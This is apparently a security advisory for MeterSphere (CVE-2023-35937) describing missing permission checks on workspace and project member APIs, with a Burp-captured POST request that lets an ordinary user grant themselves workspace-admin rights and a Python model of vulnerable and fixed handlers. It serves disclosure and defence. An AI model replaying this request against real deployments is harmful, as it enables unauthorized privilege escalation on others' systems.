
metersphere has a missing permission check vulnerability

Moderate
fit2-zhao published GHSA-7xj3-qrx5-524r Jul 6, 2023

Package

maven metersphere (Maven)

Affected versions

<=v2.10.1 LTS

Patched versions

v2.10.2 LTS

Description

Summary

Some critical metersphere APIs currently lack permission checks, for example the workspace endpoints /setting/workspace/member/update, /setting/user/special/ws/member/add and /special/ws/member/delete/{workspaceId}/{userId}, as well as the project-related APIs.

PoC

Taking the workspace endpoint /setting/workspace/member/update as an example:

1. user1 is the workspace administrator of workspace1

2. user2 is an ordinary member of workspace1

3. user1 updates user2's information, for example promoting user2 to workspace administrator

4. Intercept the request with Burp Suite

The intercepted request to /setting/workspace/member/update:

POST /setting/workspace/member/update HTTP/1.1
Host: 192.168.213.128:8081
Content-Length: 144
Accept-Language: zh-CN
WORKSPACE: bd6fc04b-15af-43dc-8cb6-411deaec81a7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Content-Type: application/json
Accept: application/json, text/plain, */*
CSRF-TOKEN: 7wl7UAaQcpdQ+lolQXV1WYWQ+BLvd2bx2BQS22BoFb3UGqDlIbQjbELrNWgOzLgfc4YPf6nSUgllo/qpOudisg==
X-AUTH-TOKEN: 52d843aa-8791-43be-a191-f04f975f2be2
PROJECT: 2d2c879f-3f78-4701-aa6f-35aeedc25069
Origin: http://192.168.213.128:8081
Referer: http://192.168.213.128:8081/
Accept-Encoding: gzip, deflate
Cookie: __stripe_mid=f2258077-6e3a-4225-8013-a67c38c075f2242a35; step_dashboard=true; step_client_index=true; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; lastTaskModule=0; lastBugModule=0; preBranch=0; storyPreExecutionID=1; lastProduct=0; lastDocModule=0; checkedItem=6%2C4%2C3; docFilesViewType=card; preProductID=1; goback=%7B%22execution%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fbug-view-7.html%22%2C%22admin%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fcompany-browse.html%22%2C%22qa%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fbug-view-7.html%22%2C%22doc%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fdoc-objectLibs-custom-0-9.html%22%7D; tab=execution
Connection: close

{"id":"user2","name":"user2","email":"user2@test.com","phone":null,"groupIds":["ws_admin"],"workspaceId":"bd6fc04b-15af-43dc-8cb6-411deaec81a7"}

5. Replace the CSRF-TOKEN and X-AUTH-TOKEN in the request above with user2's, i.e. send the request as user2

6. The request succeeds, i.e. an ordinary user can perform an update that only an administrator should be allowed to perform
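The PoC comes down to the server authenticating the session but never asking whether that session holds ws_admin in the workspace being modified. The following model is added here and is not MeterSphere's own code: it replays the PoC request body against an in-memory membership table, once through a handler with the pre-fix behaviour and once through a hardened one; the session tokens and the ws_member group name are constructed assumptions.

```python
"""Constructed model of the missing role check behind /setting/workspace/member/update."""

WS1 = "bd6fc04b-15af-43dc-8cb6-411deaec81a7"  # workspace id from the PoC request

# Session table the server consults for X-AUTH-TOKEN (constructed values).
SESSIONS = {"token-user1": "user1", "token-user2": "user2"}

# PoC body: user2 is to be given ws_admin in workspace1.
POC_BODY = {"id": "user2", "name": "user2", "email": "user2@test.com",
            "phone": None, "groupIds": ["ws_admin"], "workspaceId": WS1}

class Forbidden(Exception):
    pass

def fresh_memberships():
    """(workspaceId, userId) -> groups; PoC steps 1 and 2: user1 admin, user2 member."""
    return {(WS1, "user1"): {"ws_admin"}, (WS1, "user2"): {"ws_member"}}

def update_member_vulnerable(headers, body, memberships):
    """Pre-fix behaviour: the session is authenticated, but nobody checks
    whether the caller may administer the workspace named in the body."""
    if headers.get("X-AUTH-TOKEN") not in SESSIONS:
        raise Forbidden("not authenticated")
    memberships[(body["workspaceId"], body["id"])] = set(body["groupIds"])

def update_member_fixed(headers, body, memberships):
    """Hardened handler: resolve the caller from the session, require the
    body's workspaceId to match the WORKSPACE header, and require the caller
    to hold ws_admin in that workspace before touching anyone's groups."""
    caller = SESSIONS.get(headers.get("X-AUTH-TOKEN"))
    if caller is None:
        raise Forbidden("not authenticated")
    ws = headers.get("WORKSPACE")
    if not ws or body.get("workspaceId") != ws:
        raise Forbidden("workspaceId in body does not match WORKSPACE header")
    if "ws_admin" not in memberships.get((ws, caller), set()):
        raise Forbidden(f"{caller} is not a workspace admin of {ws}")
    memberships[(ws, body["id"])] = set(body["groupIds"])

def replay_poc(handler, token="token-user2"):
    """Replay PoC step 5 with the given session token and report whether
    user2 ended up holding ws_admin (True means the escalation went through)."""
    memberships = fresh_memberships()
    headers = {"X-AUTH-TOKEN": token, "WORKSPACE": WS1}
    try:
        handler(headers, POC_BODY, memberships)
    except Forbidden:
        pass
    return "ws_admin" in memberships[(WS1, "user2")]
```

The check that matters is the role lookup keyed on the workspace taken from the request context, not on anything the client puts in the body.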

Impact

An ordinary user can call APIs that only a workspace administrator or project administrator should be able to call, for example promoting an ordinary user to workspace administrator.

Severity

Moderate 6.0 / 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
High
User interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
High
Availability
Low
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L

CVE ID

CVE-2023-35937
